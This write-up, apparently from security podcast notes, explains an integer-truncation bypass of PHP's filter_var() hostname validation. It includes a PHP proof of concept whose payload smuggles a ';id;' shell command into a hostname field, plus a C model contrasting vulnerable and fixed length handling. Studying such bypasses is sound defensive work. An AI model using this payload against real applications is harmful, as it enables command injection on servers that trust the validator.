Unsigned to Signed Conversion Leading to filter_var Bypass

We discussed this vulnerability during Episode 131 on 28 March 2022

Cool trick impacting PHP's filter_var() that is really a binary-level issue: if you pass a long enough string, the code behind FILTER_VALIDATE_DOMAIN with FILTER_FLAG_HOSTNAME receives the string's length (a size_t) through a C int, so a length that does not fit in 32 bits is truncated and the validator believes the input is far shorter than it actually is (zero or negative).

This can be exploited by providing a string whose total length wraps the counter while still satisfying whichever checks do run (an alphanumeric first character, a dot-separated label such as a.com at the end). In the example below the total is 5 + 4294967286 + 5 = 4294967296 = 2^32 bytes, so the truncated length is 0 and the per-character loop never gets to reject the ';' or the id command that a shell would later pick up. Ultimately this leads to a filter bypass looking something like:

<?php
// filter bypass: 5 + 4294967286 + 5 = 2^32 bytes, which truncates to 0 when the length is taken as a 32-bit int
// (needs a 64-bit build and a memory_limit that allows a 4 GiB string; on an affected build this returns the string instead of bool(false))
var_dump(filter_var("5;id;" . str_repeat("a", 4294967286) . "a.com", FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME));
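To make the narrowing concrete without allocating a 4 GiB string, here is an added example in C (not the page's code and not PHP's source): a simplified re-implementation of the hostname checks, once with the length carried as a C int the way the vulnerable validator takes it, and once as size_t. The function names, the explicit `truncated_len()` step and the stand-in `filter_var_hostname_vuln()`, which accepts a claimed length separate from the buffer so the run of 'a' can be left out, are assumptions for illustration; the page's payload length is reproduced exactly.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified model of the checks behind FILTER_VALIDATE_DOMAIN with
 * FILTER_FLAG_HOSTNAME. Illustrative re-implementation, not PHP's source:
 * total length at most 253 (trailing dot excluded), alphanumeric first
 * character, labels of at most 63 characters, no ".." / ".-" / "-."
 * sequences, and only [A-Za-z0-9-] in hostname mode. */
static int check_labels(const char *s, const char *e, int hostname)
{
    unsigned char label_len = 1;   /* 1-based position inside the current label */

    /* First character must be alphanumeric */
    if (hostname && !isalnum((unsigned char)*s)) {
        return 0;
    }
    while (s < e) {
        if (*s == '.') {
            /* A label may neither start nor end with '.' or '-' */
            if (s[1] == '.' || s[1] == '-') {
                return 0;
            }
            label_len = 1;
        } else {
            if (label_len > 63 ||
                (hostname && (*s != '-' || s[1] == '.') && !isalnum((unsigned char)*s))) {
                return 0;
            }
            label_len++;
        }
        s++;
    }
    return 1;
}

/* Vulnerable shape: the length parameter is a C int. The caller hands it a
 * zend_string length (size_t), so anything that does not fit in 32 bits is
 * silently truncated before any check runs. */
static int validate_domain_vuln(const char *domain, int len, int hostname)
{
    size_t l = len;                 /* 0 after truncation for the page's payload */
    const char *e = domain + l;

    if (l > 0 && e[-1] == '.') {    /* ignore a trailing dot */
        e--;
        l--;
    }
    if (l > 253) {
        return 0;
    }
    return check_labels(domain, e, hostname);
}

/* Hardened shape: carry the length as size_t end to end and refuse an
 * empty name outright (explicit guard chosen for this model), so there is
 * no narrowing conversion left to abuse. */
static int validate_domain_fixed(const char *domain, size_t len, int hostname)
{
    const char *e;

    if (len == 0) {
        return 0;
    }
    e = domain + len;
    if (e[-1] == '.') {
        e--;
        len--;
    }
    if (len > 253) {
        return 0;
    }
    return check_labels(domain, e, hostname);
}

/* Length of the string built on the page: "5;id;" + 4294967286 * "a" + "a.com". */
static size_t page_payload_len(void)
{
    return (size_t)5 + (size_t)4294967286ULL + (size_t)5;   /* 4294967296 == 2^32 */
}

/* The narrowing that happens implicitly at the real call site, made explicit. */
static int truncated_len(size_t len)
{
    return (int)len;
}

/* Stand-in for filter_var() on an affected build: `claimed_len` is what the
 * zend_string reports. The 4 GiB run of 'a' is omitted from `s` because, once
 * the length truncates to 0, the validator inspects nothing past s[0]. */
static int filter_var_hostname_vuln(const char *s, size_t claimed_len)
{
    return validate_domain_vuln(s, truncated_len(claimed_len), 1);
}

static int filter_var_hostname_fixed(const char *s)
{
    return validate_domain_fixed(s, strlen(s), 1);
}

int main(void)
{
    /* Constructed sample: the page's payload with the 'a' run left out */
    printf("vulnerable, page payload length: %d\n", filter_var_hostname_vuln("5;id;a.com", page_payload_len()));
    printf("vulnerable, honest length:       %d\n", filter_var_hostname_vuln("5;id;a.com", 10));
    printf("fixed:                           %d\n", filter_var_hostname_fixed("5;id;a.com"));
    return 0;
}
```

The point the model isolates is the call boundary: every check downstream is sound, but it runs on a length that no longer describes the buffer. Bounding input length before handing it to any validator (a hostname never exceeds 253 bytes) is the application-side guard that holds whatever the library does with the length internally.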